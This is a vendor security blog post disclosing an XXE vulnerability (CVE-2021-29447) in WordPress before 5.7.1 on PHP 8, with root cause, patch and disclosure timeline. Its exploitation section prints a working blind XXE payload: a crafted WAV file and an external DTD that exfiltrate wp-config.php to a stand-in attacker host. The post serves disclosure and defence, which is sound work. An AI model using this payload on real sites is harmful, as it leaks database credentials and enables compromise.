WordPress 5.7 XXE Vulnerability

Karim El Ouerghemmi

Developer

In this blog post we analyze an XXE vulnerability that our analyzers discovered in WordPress, the most popular CMS, and discuss what PHP 8 developers can learn from it.

At SonarSource, we are constantly improving our code analyzers and security rules. We recently improved our PHP security engine to detect more OWASP Top 10 and CWE Top 25 issue types. When testing our new analyzers against some of the most popular open-source PHP projects, an interesting issue was raised in the WordPress codebase.


WordPress is the world’s most popular content management system, used by approximately 40% of all websites. This wide adoption makes it one of the top targets for cyber criminals. Its code is heavily reviewed by the security community and by bug bounty hunters who get paid for reporting security issues. Critical code issues rarely slip through their hands.


In this blog post we investigate the new vulnerability reported by our analyzer. We explain its root cause, which is related to PHP 8, and demonstrate how an attacker could leverage it to undermine the security of a WordPress installation. We responsibly disclosed the code vulnerability to the WordPress security team, who fixed it in version 5.7.1. It was assigned CVE-2021-29447.


Impact

The detected code vulnerability is an authenticated XML External Entity (XXE) injection. It affects WordPress versions prior to 5.7.1 and can allow remote attackers to achieve:

  • Arbitrary File Disclosure: the content of any file on the host’s file system could be retrieved, e.g. wp-config.php which contains sensitive data such as database credentials.
  • Server-Side Request Forgery (SSRF): HTTP requests could be made on behalf of the WordPress installation. Depending on the environment, this can have a serious impact.

The vulnerability can be exploited only when WordPress is running on PHP 8. Additionally, the attacker needs permission to upload media files. On a standard WordPress installation this translates to having author privileges. However, combined with another vulnerability or a plugin allowing visitors to upload media files, it could be exploited with lower privileges.


WordPress released a security & maintenance update on April 14th, 2021 to patch the vulnerability and to protect its users.

Technical Details

In this section we take a closer look at the technical details of the vulnerability. First we briefly revisit what an XXE vulnerability is. Following that, we dive into the vulnerability our analyzer reported in the WordPress core by looking at where it is located in the code, and why it became exploitable again in PHP 8 even though there was an effort to prevent such vulnerabilities in the affected code lines. Finally, we demonstrate how it can be exploited by attackers by using specially crafted input to extract the wp-config.php file, and how the vulnerability is prevented.

XML External Entity (XXE) Vulnerabilities

XML offers the possibility to define custom entities that can be reused throughout a document. This can, for example, be used to avoid duplication. The following code defines an entity myEntity for further usage.

<!DOCTYPE myDoc [ <!ENTITY myEntity "a long value" > ]>
<myDoc>
    <foo>&myEntity;</foo>
    <bar>&myEntity;</bar>
</myDoc>
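
To see the substitution happen, the document above can be fed to any XML parser that expands internal entities. The following is a minimal sketch in Python, assuming the standard library's xml.etree.ElementTree module; the helper name expand_entities is ours and purely illustrative.

```python
import xml.etree.ElementTree as ET

# The sample document from above, with one internal entity used twice.
DOCUMENT = """<!DOCTYPE myDoc [ <!ENTITY myEntity "a long value" > ]>
<myDoc>
    <foo>&myEntity;</foo>
    <bar>&myEntity;</bar>
</myDoc>"""


def expand_entities(xml_text):
    """Parse xml_text and return each child's tag with its substituted text."""
    root = ET.fromstring(xml_text)
    return {child.tag: child.text for child in root}


if __name__ == "__main__":
    # Both elements carry the entity's value instead of the reference.
    print(expand_entities(DOCUMENT))
```

After parsing, neither element contains the reference &myEntity; any more. Both hold the entity's value.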

The value of defined entities can also stem from an external source referenced by a URI. In this case, they are called external entities:

<!DOCTYPE myDoc [ <!ENTITY myExternalEntity SYSTEM "http://…..com/value.txt" > ]>
<myDoc>
    <foo>&myExternalEntity;</foo>
</myDoc>

XXE attacks misuse this feature. They are possible when a loosely configured XML parser is run on user-controlled content. Loosely configured usually means that all entities are substituted with their corresponding value in the result. For example, in the last sample, if an attacker supplies file:///var/www/wp-config.php as the URI and is able to view the result of the parsed XML, she successfully leaks sensitive file content. However, the result of parsed XML is not always displayed back to the user, which is the case for the WordPress vulnerability described in this post. As we will see later, there are ways to work around that.


This is the main idea and mechanism behind XXE (learn more in our rule database). Besides sensitive file disclosure, XXE can also have other impacts, such as Server-Side Request Forgery (a request has to be made to retrieve the content of external entities; see rule S5144) and Denial of Service (entities can reference other entities, which can result in exponential growth during substitution, a.k.a. the Billion Laughs attack).

XXE in WordPress

WordPress has a Media Library that enables authenticated users to upload media files that can then be used in their blog posts. To extract meta information from these media files, e.g., artist name or title, WordPress uses the getID3 library. Some of this metadata is parsed in XML form. Here, our analyzer reported a possible XXE vulnerability (line 730).

wp-includes/ID3/getid3.lib.php

723    if (PHP_VERSION_ID < 80000) {
724
725        // This function has been deprecated in PHP 8.0 because in libxml 2.9.0, external entity loading is
726        // disabled by default, so this function is no longer needed to protect against XXE attacks.
728        $loader = libxml_disable_entity_loader(true);
729    }
730    $XMLobject = simplexml_load_string($XMLstring, 'SimpleXMLElement', LIBXML_NOENT);

simplexml_load_string() is a PHP function that parses the string passed as its first argument as XML. The underlying XML parser (PHP relies on libxml2) can be configured with flags passed in the third argument.


The comments in this piece of code are of particular interest as they mention protection against XXE. Reading them while reviewing this finding of a static code analyzer might raise the suspicion that it is a false positive, and that correct precautions have been taken to avoid the vulnerability. But is it? (Spoiler: no.)


To better understand the code and the surrounding comments, it is useful to look at its history. In 2014, an XXE vulnerability was fixed in WordPress 3.9.2. This is the main reason the call libxml_disable_entity_loader(true) was added at that point. The PHP function libxml_disable_entity_loader() configures the XML parser to disable external entity loading.


Recently, with the release of PHP 8, the code was slightly adapted to accommodate the deprecation of the libxml_disable_entity_loader() function and to call it only if the running PHP version is older than 8. This function was deprecated because newer PHP versions use libxml2 v2.9+, which disables external entity fetching by default.


Now the subtlety in the code we are looking at is that simplexml_load_string() is not called with default configuration. Even though the name might not suggest it, the flag LIBXML_NOENT enables entity substitution. Surprisingly, NOENT in this case means that no entities will be left in the result, and thus external entities will be fetched and substituted. As a result, exploiting the XXE vulnerability that was fixed in WordPress 3.9.2 was made possible again on WordPress instances running on PHP 8.
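
The interplay between the version check and the LIBXML_NOENT flag can be written down as a small truth table. The following Python sketch is only a simplified model of the reasoning above, assuming libxml2 2.9+ behaves as described in this post. It does not call any XML parser, and the function names and the patched parameter are our own illustrative inventions.

```python
PHP_8_VERSION_ID = 80000  # the value compared against PHP_VERSION_ID in the excerpt


def loader_disabled(php_version_id, patched):
    """Model whether libxml_disable_entity_loader(true) is in effect."""
    if patched:
        # Assumption: models WordPress 5.7.1, which calls the function on every version.
        return True
    # Before the patch the call was skipped on PHP 8 and later.
    return php_version_id < PHP_8_VERSION_ID


def external_entities_fetched(noent_flag, disabled):
    """Simplified model: entities are fetched only if substitution is
    requested (LIBXML_NOENT) and the entity loader was not disabled."""
    return noent_flag and not disabled


if __name__ == "__main__":
    for version in (70400, 80000):
        for patched in (False, True):
            fetched = external_entities_fetched(True, loader_disabled(version, patched))
            print(version, "patched" if patched else "unpatched", fetched)
```

In this model the only combination that fetches external entities is the unpatched code on PHP 8, which matches the conditions under which the vulnerability is exploitable.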

Exploitation

To exploit the described vulnerability it is necessary to understand if and how user-controlled data can reach the point where it gets parsed as XML as part of the $XMLstring variable in:

wp-includes/ID3/getid3.lib.php

721    public static function XML2array($XMLstring) {
…
730        $XMLobject = simplexml_load_string($XMLstring, 'SimpleXMLElement', LIBXML_NOENT);

WordPress uses getID3 to extract metadata from files that are uploaded to its media library. Investigation of the getID3 library revealed that the string being parsed at that point is the iXML chunk of a wave audio file when its metadata gets analyzed.

wp-includes/ID3/module.audio-video.riff.php

426    if (isset($thisfile_riff_WAVE['iXML'][0]['data'])) {
427        // requires functions simplexml_load_string and get_object_vars
428        if ($parsedXML = getid3_lib::XML2array($thisfile_riff_WAVE['iXML'][0]['data'])) {

WordPress allows uploading wave audio files, and extracts their metadata with the wp_read_audio_metadata() function (which relies on getID3). Thus, by uploading a crafted wave file, malicious XML can be injected and parsed. A minimal file that has the necessary structure to be handled as wave and that contains an attack payload in the iXML chunk can be created with the following content:

RIFFXXXXWAVEiXMLBBBB_OUR_PAYLOAD_

(BBBB being four bytes representing the length of the XML payload in little endian; in the RIFF format this size field follows the four-byte chunk ID.)
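
The container layout can be sketched in a few lines of Python. This is a minimal illustration, assuming the standard RIFF chunk layout (four-byte chunk ID, four-byte little-endian size, then the data, padded to an even length). The helper names build_wav_with_ixml and extract_ixml are ours, and the XML used in the usage example is a harmless placeholder.

```python
import struct


def build_wav_with_ixml(xml_payload):
    """Wrap xml_payload (bytes) in a minimal RIFF/WAVE container with one iXML chunk."""
    # A RIFF chunk is: 4-byte ID, 4-byte little-endian data size, then the data.
    chunk = b"iXML" + struct.pack("<I", len(xml_payload)) + xml_payload
    # Chunks are word-aligned: odd-sized data is followed by one pad byte
    # that is not counted in the chunk's own size field.
    if len(xml_payload) % 2:
        chunk += b"\x00"
    body = b"WAVE" + chunk
    # The outer RIFF size covers everything after the first 8 bytes.
    return b"RIFF" + struct.pack("<I", len(body)) + body


def extract_ixml(wav):
    """Return the data of the first iXML chunk, or None if there is none."""
    if wav[:4] != b"RIFF" or wav[8:12] != b"WAVE":
        return None
    offset = 12
    while offset + 8 <= len(wav):
        chunk_id = wav[offset:offset + 4]
        (size,) = struct.unpack_from("<I", wav, offset + 4)
        if chunk_id == b"iXML":
            return wav[offset + 8:offset + 8 + size]
        # Skip this chunk, including its pad byte if the size is odd.
        offset += 8 + size + (size % 2)
    return None


if __name__ == "__main__":
    wav = build_wav_with_ixml(b"<r>placeholder</r>")
    print(extract_ixml(wav))
```

The resulting file contains no audio data at all. It only has the structure needed for the iXML chunk to be located, which is what extract_ixml does in the reverse direction.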

Blind XXE

When an attacker injects a payload with the described strategy, the result of the parsed XML is not displayed in the user interface. Thus, to extract the content of a sensitive file (e.g., wp-config.php), the attacker must rely on a blind XXE technique (also called out-of-band XXE). This is similar to the technique described in our previous blog post about exploiting Shopware. The basic idea is this:

  • A first external entity (e.g., %data) is created whose value will be substituted with the content of the file.
  • Another external entity is created whose URI is set to “http://attacker_domain.com/%data;”. Note the value of the URI contains the first entity which will be substituted.
  • When resolving the second entity, the parser will make a request to “http://attacker_domain.com/_SUBSTITUTED_data”, making the content of the file visible in the logs of the web server.

To make the URI of the external entity dependent on the value of another substituted entity, we use parameter entities and an external DTD. Furthermore, we use the php:// stream wrapper to compress and encode the content of the file. Putting things together, the following would lead to the extraction of the sensitive wp-config.php file:

payload.wav

RIFFXXXXWAVEiXMLBBBB<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://attacker-url.domain/xxe.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>

(BBBB being four bytes representing the length of the XML payload in little endian.)

xxe.dtd

<!ENTITY % data SYSTEM "php://filter/zlib.deflate/convert.base64-encode/resource=../wp-config.php">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://attacker-url.domain/?%data;'>">

Patch

WordPress patched the vulnerability in version 5.7.1 by calling libxml_disable_entity_loader() again on all PHP versions, including PHP 8, where the function is deprecated. To avoid PHP deprecation warnings, the PHP error suppression operator @ was added to the call.


wp-includes/ID3/getid3.lib.php

721    public static function XML2array($XMLstring) {
…
727      $loader = @libxml_disable_entity_loader(true);
728      $XMLobject = simplexml_load_string($XMLstring, 'SimpleXMLElement', LIBXML_NOENT);

An alternative to reintroducing the call to the deprecated function would have been to use PHP’s libxml_set_external_entity_loader() function. This is the recommended way according to the PHP documentation. It also allows more granular control over the external entity loader in case the possibility of loading specific resources is required. This is, of course, only necessary if entity substitution is really required in PHP 8.
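
What such granular control could look like is sketched below. The snippet is written in Python purely to illustrate the decision a custom loader would have to make. In PHP, equivalent logic would live in the callback registered with libxml_set_external_entity_loader(). The function is_entity_allowed and the directory /srv/dtds are hypothetical, and the policy (local files below one directory only) is an assumption, not WordPress code.

```python
import os
from urllib.parse import urlparse


def is_entity_allowed(system_id, allowed_dir):
    """Allow only local files located below allowed_dir (hypothetical policy)."""
    parsed = urlparse(system_id)
    # Reject every scheme except plain paths and file://, e.g. http:// or php://.
    if parsed.scheme not in ("", "file"):
        return False
    # Reject file:// URIs that point at another host.
    if parsed.netloc not in ("", "localhost"):
        return False
    # Resolve '..' segments and symlinks before comparing locations.
    path = os.path.realpath(parsed.path)
    root = os.path.realpath(allowed_dir)
    return os.path.commonpath([path, root]) == root


if __name__ == "__main__":
    for candidate in (
        "/srv/dtds/schema.dtd",
        "/srv/dtds/../../etc/passwd",
        "http://attacker-url.domain/xxe.dtd",
        "php://filter/convert.base64-encode/resource=../wp-config.php",
    ):
        print(candidate, is_entity_allowed(candidate, "/srv/dtds"))
```

An allowlist of this kind rejects both URIs used in the attack above, while still permitting trusted local DTDs if an application really needs them.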

Timeline

Date        What
04.02.2021  We report the vulnerability with PoC on HackerOne
05.02.2021  WordPress acknowledges receipt of report
01.03.2021  WordPress updates us about triage and a fix in progress
08.03.2021  WordPress informs us about upcoming security release
14.04.2021  WordPress releases version 5.7.1

Summary

In this blog post we looked at an interesting XXE vulnerability we discovered in the most popular content management system, WordPress. It allows authenticated attackers to leak sensitive files from the host server which can lead to a full compromise. We showed how this type of vulnerability works and how attackers can exploit it by using blind XXE techniques. Further, we learned about a related pitfall in PHP 8 code and how developers can prevent this type of code vulnerability in their own applications. We would like to thank the WordPress team for a great collaboration and a quick resolution with a new patch release.

